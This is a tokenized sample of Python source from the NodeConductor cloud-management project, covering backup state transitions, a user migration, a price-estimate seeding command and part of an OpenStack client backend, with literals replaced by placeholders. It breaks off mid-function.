<EOL> BACKING_UP = <NUM_LIT:2> <EOL> RESTORING = <NUM_LIT:3> <EOL> DELETING = <NUM_LIT:4> <EOL> ERRED = <NUM_LIT:5> <EOL> DELETED = <NUM_LIT:6> <EOL> STATE_CHOICES = ( <EOL> ( States . READY , '<STR_LIT>' ) , <EOL> ( States . BACKING_UP , '<STR_LIT>' ) , <EOL> ( States . RESTORING , '<STR_LIT>' ) , <EOL> ( States . DELETING , '<STR_LIT>' ) , <EOL> ( States . ERRED , '<STR_LIT>' ) , <EOL> ( States . DELETED , '<STR_LIT>' ) , <EOL> ) <EOL> state = FSMIntegerField ( default = States . READY , choices = STATE_CHOICES ) <EOL> metadata = JSONField ( <EOL> blank = True , <EOL> help_text = '<STR_LIT>' , <EOL> ) <EOL> objects = managers . BackupManager ( ) <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % { <EOL> '<STR_LIT>' : self . uuid , <EOL> '<STR_LIT:object>' : self . backup_source , <EOL> } <EOL> def start_backup ( self ) : <EOL> """<STR_LIT>""" <EOL> from nodeconductor . backup import tasks <EOL> self . _starting_backup ( ) <EOL> self . __save ( ) <EOL> tasks . process_backup_task . delay ( self . uuid . hex ) <EOL> def start_restoration ( self , instance_uuid , user_input , snapshot_ids ) : <EOL> """<STR_LIT>""" <EOL> from nodeconductor . backup import tasks <EOL> self . _starting_restoration ( ) <EOL> self . __save ( ) <EOL> tasks . restoration_task . delay ( self . uuid . hex , instance_uuid . hex , user_input , snapshot_ids ) <EOL> def start_deletion ( self ) : <EOL> """<STR_LIT>""" <EOL> from nodeconductor . backup import tasks <EOL> self . _starting_deletion ( ) <EOL> self . __save ( ) <EOL> tasks . deletion_task . delay ( self . uuid . hex ) <EOL> def set_metadata ( self , metadata ) : <EOL> self . metadata = metadata <EOL> self . __save ( ) <EOL> def confirm_backup ( self ) : <EOL> self . _confirm_backup ( ) <EOL> self . __save ( ) <EOL> def confirm_restoration ( self ) : <EOL> self . _confirm_restoration ( ) <EOL> self . __save ( ) <EOL> def confirm_deletion ( self ) : <EOL> self . _confirm_deletion ( ) <EOL> self . __save ( ) <EOL> def erred ( self ) : <EOL> self . _erred ( ) <EOL> self . __save ( ) <EOL> def get_strategy ( self ) : <EOL> try : <EOL> return utils . get_object_backup_strategy ( self . backup_source ) <EOL> except KeyError : <EOL> six . reraise ( exceptions . BackupStrategyNotFoundError , exceptions . BackupStrategyNotFoundError ( ) ) <EOL> @ transition ( field = state , source = States . READY , target = States . BACKING_UP ) <EOL> def _starting_backup ( self ) : <EOL> pass <EOL> @ transition ( field = state , source = States . BACKING_UP , target = States . READY ) <EOL> def _confirm_backup ( self ) : <EOL> pass <EOL> @ transition ( field = state , source = States . READY , target = States . RESTORING ) <EOL> def _starting_restoration ( self ) : <EOL> pass <EOL> @ transition ( field = state , source = States . RESTORING , target = States . READY ) <EOL> def _confirm_restoration ( self ) : <EOL> pass <EOL> @ transition ( field = state , source = States . READY , target = States . DELETING ) <EOL> def _starting_deletion ( self ) : <EOL> pass <EOL> @ transition ( field = state , source = States . DELETING , target = States . DELETED ) <EOL> def _confirm_deletion ( self ) : <EOL> pass <EOL> @ transition ( field = state , source = '<STR_LIT:*>' , target = States . ERRED ) <EOL> def _erred ( self ) : <EOL> pass <EOL> def __save ( self , * args , ** kwargs ) : <EOL> return super ( Backup , self ) . save ( * args , ** kwargs ) <EOL> def get_log_fields ( self ) : <EOL> return ( '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> class BackupStrategy ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def get_model ( cls ) : <EOL> raise NotImplementedError ( <EOL> '<STR_LIT>' ) <EOL> @ classmethod <EOL> def backup ( cls , backup_source ) : <EOL> raise NotImplementedError ( <EOL> '<STR_LIT>' ) <EOL> @ classmethod <EOL> def restore ( cls , backup_source , metadata , user_input ) : <EOL> raise NotImplementedError ( <EOL> '<STR_LIT>' ) <EOL> @ classmethod <EOL> def get_restoration_serializer ( cls , backup_source , metadata , user_input ) : <EOL> raise NotImplementedError ( <EOL> '<STR_LIT>' ) <EOL> @ classmethod <EOL> def delete ( cls , backup_source , metadata ) : <EOL> raise NotImplementedError ( <EOL> '<STR_LIT>' ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> import re <EOL> import nodeconductor . core . models <EOL> import django . utils . timezone <EOL> from django . conf import settings <EOL> import django . contrib . auth . models <EOL> import uuidfield . fields <EOL> import django . core . validators <EOL> class Migration ( migrations . Migration ) : <EOL> replaces = [ ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT:password>' , models . CharField ( max_length = <NUM_LIT> , verbose_name = '<STR_LIT:password>' ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( null = True , verbose_name = '<STR_LIT>' , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False , help_text = '<STR_LIT>' , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:description>' , models . CharField ( max_length = <NUM_LIT> , verbose_name = '<STR_LIT:description>' , blank = True ) ) , <EOL> ( '<STR_LIT>' , uuidfield . fields . UUIDField ( unique = True , max_length = <NUM_LIT:32> , editable = False , blank = True ) ) , <EOL> ( '<STR_LIT:username>' , models . CharField ( help_text = '<STR_LIT>' , unique = True , max_length = <NUM_LIT:30> , verbose_name = '<STR_LIT:username>' , validators = [ django . core . validators . RegexValidator ( re . compile ( '<STR_LIT>' ) , '<STR_LIT>' , '<STR_LIT>' ) ] ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( null = True , default = None , max_length = <NUM_LIT:10> , blank = True , unique = True , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:100> , verbose_name = '<STR_LIT>' , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:100> , verbose_name = '<STR_LIT>' , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT> , verbose_name = '<STR_LIT>' , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT> , verbose_name = '<STR_LIT>' , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT> , verbose_name = '<STR_LIT>' , blank = True ) ) , <EOL> ( '<STR_LIT:email>' , models . EmailField ( max_length = <NUM_LIT> , verbose_name = '<STR_LIT>' , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = False , help_text = '<STR_LIT>' , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = True , help_text = '<STR_LIT>' , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( default = django . utils . timezone . now , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . ManyToManyField ( related_query_name = '<STR_LIT:user>' , related_name = '<STR_LIT>' , to = '<STR_LIT>' , blank = True , help_text = '<STR_LIT>' , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . ManyToManyField ( related_query_name = '<STR_LIT:user>' , related_name = '<STR_LIT>' , to = b'<STR_LIT>' , blank = True , help_text = '<STR_LIT>' , verbose_name = '<STR_LIT>' ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : '<STR_LIT:user>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> managers = [ <EOL> ( '<STR_LIT>' , django . contrib . auth . models . UserManager ( ) ) , <EOL> ] , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , uuidfield . fields . UUIDField ( unique = True , max_length = <NUM_LIT:32> , editable = False , blank = True ) ) , <EOL> ( '<STR_LIT:name>' , models . CharField ( max_length = <NUM_LIT> , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , models . TextField ( validators = [ django . core . validators . MaxLengthValidator ( <NUM_LIT> ) , nodeconductor . core . models . validate_ssh_public_key ] ) ) , <EOL> ( '<STR_LIT:user>' , models . ForeignKey ( to = settings . AUTH_USER_MODEL ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : set ( [ ( '<STR_LIT:user>' , '<STR_LIT:name>' ) ] ) , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT:user>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . BooleanField ( default = False , help_text = '<STR_LIT>' , verbose_name = '<STR_LIT>' ) , <EOL> preserve_default = True , <EOL> ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> import random <EOL> from django . core . management . base import BaseCommand <EOL> from django . utils import timezone <EOL> from nodeconductor . cost_tracking import models <EOL> class Command ( BaseCommand ) : <EOL> def handle ( self , * args , ** options ) : <EOL> current_month = timezone . now ( ) . month <EOL> current_year = timezone . now ( ) . year <EOL> for model in models . PriceEstimate . get_estimated_models ( ) : <EOL> self . stdout . write ( '<STR_LIT>' . format ( model . __name__ ) ) <EOL> estimates = [ ] <EOL> for obj in model . objects . all ( ) : <EOL> self . stdout . write ( '<STR_LIT>' . format ( obj ) ) <EOL> for i in range ( <NUM_LIT:6> ) : <EOL> year = current_year <EOL> month = current_month - i <EOL> if month < <NUM_LIT:1> : <EOL> year = current_year - <NUM_LIT:1> <EOL> month += <NUM_LIT:12> <EOL> estimates . append ( <EOL> models . PriceEstimate ( <EOL> scope = obj , <EOL> total = random . randint ( <NUM_LIT:100> , <NUM_LIT> ) , <EOL> details = { <EOL> '<STR_LIT>' : random . randint ( <NUM_LIT:50> , <NUM_LIT:200> ) , <EOL> '<STR_LIT>' : random . randint ( <NUM_LIT:50> , <NUM_LIT:200> ) , <EOL> '<STR_LIT>' : random . randint ( <NUM_LIT:50> , <NUM_LIT:200> ) , <EOL> } , <EOL> year = year , <EOL> month = month , <EOL> ) <EOL> ) <EOL> models . PriceEstimate . objects . bulk_create ( estimates ) <EOL> self . stdout . write ( '<STR_LIT>' ) </s>
<s> from __future__ import unicode_literals <EOL> import re <EOL> import time <EOL> import uuid <EOL> import logging <EOL> import datetime <EOL> import calendar <EOL> import pkg_resources <EOL> import dateutil . parser <EOL> from itertools import groupby <EOL> from ceilometerclient import client as ceilometer_client <EOL> from cinderclient import exceptions as cinder_exceptions <EOL> from cinderclient . v1 import client as cinder_client <EOL> from django . conf import settings <EOL> from django . contrib . auth import get_user_model <EOL> from django . core . exceptions import ObjectDoesNotExist , MultipleObjectsReturned <EOL> from django . db import transaction <EOL> from django . db . models import ProtectedError <EOL> from django . utils import dateparse <EOL> from django . utils import six <EOL> from django . utils import timezone <EOL> from django . utils . lru_cache import lru_cache <EOL> from glanceclient import exc as glance_exceptions <EOL> from glanceclient . v1 import client as glance_client <EOL> from keystoneclient import exceptions as keystone_exceptions <EOL> from keystoneclient import session as keystone_session <EOL> from keystoneclient . auth . identity import v2 <EOL> from keystoneclient . service_catalog import ServiceCatalog <EOL> from keystoneclient . v2_0 import client as keystone_client <EOL> from neutronclient . client import exceptions as neutron_exceptions <EOL> from neutronclient . v2_0 import client as neutron_client <EOL> from novaclient import exceptions as nova_exceptions <EOL> from novaclient . v1_1 import client as nova_client <EOL> from nodeconductor . core import NodeConductorExtension <EOL> from nodeconductor . core . models import SynchronizationStates <EOL> from nodeconductor . core . tasks import send_task <EOL> from nodeconductor . iaas . log import event_logger <EOL> from nodeconductor . iaas import models <EOL> from nodeconductor . structure import ServiceBackend , ServiceBackendError , ServiceBackendNotImplemented <EOL> logger = logging . getLogger ( __name__ ) <EOL> @ lru_cache ( maxsize = <NUM_LIT:1> ) <EOL> def _get_cinder_version ( ) : <EOL> try : <EOL> return pkg_resources . get_distribution ( '<STR_LIT>' ) . parsed_version <EOL> except ValueError : <EOL> return '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> @ lru_cache ( maxsize = <NUM_LIT:1> ) <EOL> def _get_neutron_version ( ) : <EOL> try : <EOL> return pkg_resources . get_distribution ( '<STR_LIT>' ) . parsed_version <EOL> except ValueError : <EOL> return '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> @ lru_cache ( maxsize = <NUM_LIT:1> ) <EOL> def _get_nova_version ( ) : <EOL> try : <EOL> return pkg_resources . get_distribution ( '<STR_LIT>' ) . parsed_version <EOL> except ValueError : <EOL> return '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> class CloudBackendError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class CloudBackendInternalError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class OpenStackClient ( object ) : <EOL> """<STR_LIT>""" <EOL> class Session ( dict ) : <EOL> """<STR_LIT>""" <EOL> OPTIONS = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:username>' , '<STR_LIT:password>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> RECREATE_SESSION = True <EOL> def __init__ ( self , backend , ks_session = None , ** credentials ) : <EOL> self . backend = backend . __class__ ( ) <EOL> self . keystone_session = ks_session <EOL> if not self . keystone_session : <EOL> auth_plugin = v2 . Password ( ** credentials ) <EOL> self . keystone_session = keystone_session . Session ( auth = auth_plugin , verify = False ) <EOL> try : <EOL> self . keystone_session . get_token ( ) <EOL> except ( keystone_exceptions . AuthorizationFailure , keystone_exceptions . ConnectionRefused ) as e : <EOL> six . reraise ( CloudBackendError , e ) <EOL> if self . RECREATE_SESSION : <EOL> for opt in credentials : <EOL> self [ opt ] = credentials [ opt ] <EOL> else : <EOL> for opt in self . OPTIONS : <EOL> self [ opt ] = getattr ( self . auth , opt ) <EOL> def __getattr__ ( self , name ) : <EOL> return getattr ( self . keystone_session , name ) <EOL> @ classmethod <EOL> def factory ( cls , backend , session ) : <EOL> if cls . RECREATE_SESSION : <EOL> return cls ( backend , ** session ) <EOL> else : <EOL> auth_plugin = v2 . Token ( <EOL> auth_url = session [ '<STR_LIT>' ] , <EOL> token = session [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] ) <EOL> ks_session = keystone_session . Session ( auth = auth_plugin ) <EOL> return cls ( backend , ks_session = ks_session ) <EOL> def validate ( self ) : <EOL> expiresat = dateutil . parser . parse ( self . auth . auth_ref [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> if expiresat > timezone . now ( ) + datetime . timedelta ( minutes = <NUM_LIT:10> ) : <EOL> return True <EOL> raise CloudBackendError ( '<STR_LIT>' ) <EOL> def __str__ ( self ) : <EOL> return str ( { k : v if k != '<STR_LIT:password>' else '<STR_LIT>' for k , v in self } ) <EOL> def create_admin_session ( self , keystone_url ) : <EOL> try : <EOL> credentials = models . OpenStackSettings . objects . get ( <EOL> auth_url = keystone_url ) . get_credentials ( ) <EOL> except models . OpenStackSettings . DoesNotExist as e : <EOL> logger . exception ( '<STR_LIT>' , keystone_url ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> self . session = self . Session ( self , ** credentials ) <EOL> return self . session <EOL> def create_tenant_session ( self , credentials ) : <EOL> try : <EOL> self . session = self . Session ( self , ** credentials ) <EOL> except AttributeError as e : <EOL> logger . error ( '<STR_LIT>' ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> return self . session <EOL> @ classmethod <EOL> def recover_session ( cls , session ) : <EOL> """<STR_LIT>""" <EOL> if not session or ( not cls . Session . RECREATE_SESSION and not session . get ( '<STR_LIT>' ) ) : <EOL> raise CloudBackendError ( '<STR_LIT>' ) <EOL> backend = cls ( ) <EOL> return backend . Session . factory ( backend , session ) <EOL> @ classmethod <EOL> def create_keystone_client ( cls , session ) : <EOL> return keystone_client . Client ( session = session ) <EOL> @ classmethod <EOL> def create_nova_client ( cls , session ) : <EOL> if _get_nova_version ( ) >= pkg_resources . parse_version ( '<STR_LIT>' ) : <EOL> kwargs = { '<STR_LIT>' : session . keystone_session } <EOL> else : <EOL> auth_plugin = session . auth <EOL> kwargs = { <EOL> '<STR_LIT>' : auth_plugin . auth_url , <EOL> '<STR_LIT:username>' : auth_plugin . username , <EOL> '<STR_LIT>' : auth_plugin . password , <EOL> '<STR_LIT>' : auth_plugin . tenant_id , <EOL> '<STR_LIT>' : auth_plugin . tenant_name , <EOL> } <EOL> return nova_client . Client ( ** kwargs ) <EOL> @ classmethod <EOL> def create_neutron_client ( cls , session ) : <EOL> if _get_neutron_version ( ) >= pkg_resources . parse_version ( '<STR_LIT>' ) : <EOL> kwargs = { '<STR_LIT>' : session . keystone_session } <EOL> else : <EOL> auth_plugin = session . auth <EOL> kwargs = { <EOL> '<STR_LIT>' : auth_plugin . auth_url , <EOL> '<STR_LIT:username>' : auth_plugin . username , <EOL> '<STR_LIT:password>' : auth_plugin . password , <EOL> '<STR_LIT>' : auth_plugin . tenant_id , <EOL> '<STR_LIT>' : auth_plugin . tenant_name , <EOL> } <EOL> return neutron_client . Client ( ** kwargs ) <EOL> @ classmethod <EOL> def create_cinder_client ( cls , session ) : <EOL> if _get_cinder_version ( ) >= pkg_resources . parse_version ( '<STR_LIT>' ) : <EOL> kwargs = { '<STR_LIT>' : session . keystone_session } <EOL> else : <EOL> auth_plugin = session . auth <EOL> kwargs = { <EOL> '<STR_LIT>' : auth_plugin . auth_url , <EOL> '<STR_LIT:username>' : auth_plugin . username , <EOL> '<STR_LIT>' : auth_plugin . password , <EOL> '<STR_LIT>' : auth_plugin . tenant_id , <EOL> '<STR_LIT>' : auth_plugin . tenant_name , <EOL> } <EOL> return cinder_client . Client ( ** kwargs ) <EOL> @ classmethod <EOL> def create_glance_client ( cls , session ) : <EOL> catalog = ServiceCatalog . factory ( session . auth . auth_ref ) <EOL> endpoint = catalog . url_for ( service_type = '<STR_LIT:image>' ) <EOL> kwargs = { <EOL> '<STR_LIT>' : session . get_token ( ) , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> return glance_client . Client ( endpoint , ** kwargs ) <EOL> @ classmethod <EOL> def create_ceilometer_client ( cls , session ) : <EOL> catalog = ServiceCatalog . factory ( session . auth . auth_ref ) <EOL> endpoint = catalog . url_for ( service_type = '<STR_LIT>' ) <EOL> kwargs = { <EOL> '<STR_LIT>' : lambda : session . get_token ( ) , <EOL> '<STR_LIT>' : endpoint , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> return ceilometer_client . Client ( '<STR_LIT:2>' , ** kwargs ) <EOL> class OpenStackBackend ( ServiceBackend , OpenStackClient ) : <EOL> """<STR_LIT>""" <EOL> MAX_USERNAME_LENGTH = <NUM_LIT:64> <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> pass <EOL> @ classmethod <EOL> def create_session ( <EOL> cls , keystone_url = None , instance_uuid = None , membership_id = None , check_tenant = True , membership = None , <EOL> ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> backend = cls ( ) <EOL> if keystone_url : <EOL> return backend . create_admin_session ( keystone_url ) <EOL> elif instance_uuid or membership or membership_id : <EOL> if instance_uuid : <EOL> instance = models . Instance . objects . get ( uuid = instance_uuid ) <EOL> membership = instance . cloud_project_membership <EOL> if membership_id : <EOL> membership = models . CloudProjectMembership . objects . get ( id = membership_id ) <EOL> credentials = { <EOL> '<STR_LIT>' : membership . cloud . auth_url , <EOL> '<STR_LIT:username>' : membership . username , <EOL> '<STR_LIT:password>' : membership . password , <EOL> } <EOL> if check_tenant : <EOL> if not membership . tenant_id : <EOL> raise CloudBackendError ( "<STR_LIT>" ) <EOL> credentials [ '<STR_LIT>' ] = membership . tenant_id <EOL> return backend . create_tenant_session ( credentials ) <EOL> raise CloudBackendError ( '<STR_LIT>' ) <EOL> def get_backend_disk_size ( self , core_disk_size ) : <EOL> return core_disk_size / <NUM_LIT> <EOL> def get_backend_ram_size ( self , core_ram_size ) : <EOL> return core_ram_size <EOL> def get_core_disk_size ( self , backend_disk_size ) : <EOL> return backend_disk_size * <NUM_LIT> <EOL> def get_core_ram_size ( self , backend_ram_size ) : <EOL> return backend_ram_size <EOL> def stop ( self , instance ) : <EOL> instance . schedule_stopping ( ) <EOL> instance . save ( ) <EOL> send_task ( '<STR_LIT>' , '<STR_LIT>' ) ( instance . uuid . hex ) <EOL> def add_ssh_key ( self , public_key , membership ) : <EOL> return self . push_ssh_public_key ( membership , public_key ) <EOL> def remove_ssh_key ( self , public_key , membership ) : <EOL> return self . remove_ssh_public_key ( membership , public_key ) <EOL> def add_user ( self , user , membership ) : <EOL> pass <EOL> def remove_user ( self , user , membership ) : <EOL> pass <EOL> def remove_link ( self , membership ) : <EOL> raise ServiceBackendNotImplemented <EOL> def get_resources_for_import ( self ) : <EOL> raise ServiceBackendNotImplemented <EOL> def get_monthly_cost_estimate ( self , instance ) : <EOL> if not NodeConductorExtension . is_installed ( '<STR_LIT>' ) : <EOL> raise ServiceBackendNotImplemented <EOL> from nodeconductor_killbill . backend import KillBillBackend , KillBillError <EOL> from nodeconductor . openstack . models import Instance as opInstance <EOL> if opInstance . objects . filter ( uuid = instance . uuid ) . exists ( ) : <EOL> raise ServiceBackendNotImplemented <EOL> try : <EOL> backend = KillBillBackend ( instance . customer ) <EOL> invoice = backend . get_invoice_estimate ( instance ) <EOL> except KillBillError as e : <EOL> logger . error ( "<STR_LIT>" , instance , e ) <EOL> six . reraise ( ServiceBackendError , e ) <EOL> today = datetime . date . today ( ) <EOL> if not invoice [ '<STR_LIT>' ] <= today <= invoice [ '<STR_LIT>' ] : <EOL> raise ServiceBackendError ( "<STR_LIT>" % ( instance , invoice ) ) <EOL> daily_cost = invoice [ '<STR_LIT>' ] / ( ( today - invoice [ '<STR_LIT>' ] ) . days + <NUM_LIT:1> ) <EOL> monthly_cost = daily_cost * calendar . monthrange ( today . year , today . month ) [ <NUM_LIT:1> ] <EOL> return monthly_cost <EOL> def push_cloud_account ( self , cloud_account ) : <EOL> pass <EOL> def pull_cloud_account ( self , cloud_account ) : <EOL> self . pull_flavors ( cloud_account ) <EOL> self . pull_images ( cloud_account ) <EOL> self . pull_service_statistics ( cloud_account ) <EOL> def pull_flavors ( self , cloud_account ) : <EOL> session = self . create_session ( keystone_url = cloud_account . auth_url ) <EOL> nova = self . create_nova_client ( session ) <EOL> backend_flavors = nova . flavors . findall ( is_public = True ) <EOL> backend_flavors = dict ( ( ( f . id , f ) for f in backend_flavors ) ) <EOL> with transaction . atomic ( ) : <EOL> nc_flavors = cloud_account . flavors . all ( ) <EOL> nc_flavors = dict ( ( ( f . backend_id , f ) for f in nc_flavors ) ) <EOL> backend_ids = set ( backend_flavors . keys ( ) ) <EOL> nc_ids = set ( nc_flavors . keys ( ) ) <EOL> for flavor_id in nc_ids - backend_ids : <EOL> nc_flavor = nc_flavors [ flavor_id ] <EOL> logger . debug ( '<STR_LIT>' , nc_flavor . uuid ) <EOL> try : <EOL> nc_flavor . delete ( ) <EOL> except ProtectedError : <EOL> logger . info ( '<STR_LIT>' , <EOL> nc_flavor . uuid ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , nc_flavor . uuid ) <EOL> for flavor_id in backend_ids - nc_ids : <EOL> backend_flavor = backend_flavors [ flavor_id ] <EOL> nc_flavor = cloud_account . flavors . create ( <EOL> name = backend_flavor . name , <EOL> cores = backend_flavor . vcpus , <EOL> ram = self . get_core_ram_size ( backend_flavor . ram ) , <EOL> disk = self . get_core_disk_size ( backend_flavor . disk ) , <EOL> backend_id = backend_flavor . id , <EOL> ) <EOL> logger . info ( '<STR_LIT>' , nc_flavor . uuid ) <EOL> for flavor_id in nc_ids & backend_ids : <EOL> nc_flavor = nc_flavors [ flavor_id ] <EOL> backend_flavor = backend_flavors [ flavor_id ] <EOL> nc_flavor . name = backend_flavor . name <EOL> nc_flavor . cores = backend_flavor . vcpus <EOL> nc_flavor . ram = self . get_core_ram_size ( backend_flavor . ram ) <EOL> nc_flavor . disk = self . get_core_disk_size ( backend_flavor . disk ) <EOL> nc_flavor . save ( ) <EOL> logger . debug ( '<STR_LIT>' , nc_flavor . uuid ) <EOL> def pull_images ( self , cloud_account ) : <EOL> session = self . create_session ( keystone_url = cloud_account . auth_url ) <EOL> glance = self . create_glance_client ( session ) <EOL> backend_images = dict ( <EOL> ( image . id , image ) <EOL> for image in glance . images . list ( ) <EOL> if not image . deleted <EOL> if image . is_public <EOL> ) <EOL> from nodeconductor . iaas . models import TemplateMapping <EOL> with transaction . atomic ( ) : <EOL> current_image_ids = set ( ) <EOL> mapping_queryset = ( <EOL> TemplateMapping . objects <EOL> . filter ( backend_image_id__in = backend_images . keys ( ) ) <EOL> . order_by ( '<STR_LIT>' ) <EOL> ) <EOL> mappings_grouped = groupby ( mapping_queryset . iterator ( ) , lambda m : m . template . pk ) <EOL> for _ , mapping_iterator in mappings_grouped : <EOL> mappings = list ( mapping_iterator ) <EOL> mapping = mappings [ <NUM_LIT:0> ] <EOL> if len ( mappings ) > <NUM_LIT:1> : <EOL> logger . error ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> mapping . template , '<STR_LIT:U+002CU+0020>' . join ( m . backend_image_id for m in mappings ) , <EOL> ) <EOL> else : <EOL> backend_image = backend_images [ mapping . backend_image_id ] <EOL> image , created = cloud_account . images . get_or_create ( <EOL> template = mapping . template , <EOL> defaults = { '<STR_LIT>' : mapping . backend_image_id } , <EOL> ) <EOL> if created : <EOL> logger . info ( '<STR_LIT>' , image , image . backend_id ) <EOL> elif ( image . backend_id != mapping . backend_image_id or <EOL> image . min_disk != backend_image . min_disk or <EOL> image . min_ram != backend_image . min_ram ) : <EOL> image . backend_id = mapping . backend_image_id <EOL> image . min_ram = self . get_core_ram_size ( backend_image . min_ram ) <EOL> image . min_disk = self . get_core_disk_size ( backend_image . min_disk ) <EOL> image . save ( ) <EOL> logger . debug ( '<STR_LIT>' , image , image . backend_id ) <EOL> else : <EOL> logger . debug ( '<STR_LIT>' , image , image . backend_id ) <EOL> current_image_ids . add ( image . backend_id ) <EOL> for image in cloud_account . images . exclude ( backend_id__in = current_image_ids ) : <EOL> image . delete ( ) <EOL> logger . info ( '<STR_LIT>' , image , image . backend_id ) <EOL> def push_membership ( self , membership ) : <EOL> try : <EOL> session = self . create_session ( keystone_url = membership . cloud . auth_url ) <EOL> keystone = self . create_keystone_client ( session ) <EOL> neutron = self . create_neutron_client ( session ) <EOL> tenant = self . get_or_create_tenant ( membership , keystone ) <EOL> username , password = self . get_or_create_user ( membership , keystone ) <EOL> membership . username = username <EOL> membership . password = password <EOL> membership . tenant_id = tenant . id <EOL> self . ensure_user_is_tenant_admin ( username , tenant , keystone ) <EOL> self . get_or_create_internal_network ( membership , neutron ) <EOL> membership . save ( ) <EOL> logger . info ( '<STR_LIT>' , membership . id ) <EOL> except keystone_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' , membership . id ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> def push_ssh_public_key ( self , membership , public_key ) : <EOL> key_name = self . get_key_name ( public_key ) <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> try : <EOL> nova . keypairs . find ( fingerprint = public_key . fingerprint ) <EOL> except nova_exceptions . NotFound : <EOL> logger . info ( '<STR_LIT>' , key_name ) <EOL> nova . keypairs . create ( name = key_name , public_key = public_key . public_key ) <EOL> logger . info ( '<STR_LIT>' , key_name ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , key_name ) <EOL> except ( nova_exceptions . ClientException , keystone_exceptions . ClientException ) as e : <EOL> logger . exception ( '<STR_LIT>' , key_name ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> def remove_ssh_public_key ( self , membership , public_key ) : <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> keys = nova . keypairs . findall ( fingerprint = public_key . fingerprint ) <EOL> key_name = self . get_key_name ( public_key ) <EOL> for key in keys : <EOL> if key . name == key_name : <EOL> nova . keypairs . delete ( key ) <EOL> logger . info ( '<STR_LIT>' , public_key . name ) <EOL> except ( nova_exceptions . ClientException , keystone_exceptions . ClientException ) as e : <EOL> logger . exception ( '<STR_LIT>' , public_key . name ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> def push_membership_quotas ( self , membership , quotas ) : <EOL> cinder_quota_mapping = { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , self . get_backend_disk_size ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , lambda x : x ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , lambda x : x ) , <EOL> } <EOL> nova_quota_mapping = { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , lambda x : x ) , <EOL> '<STR_LIT>' : ( 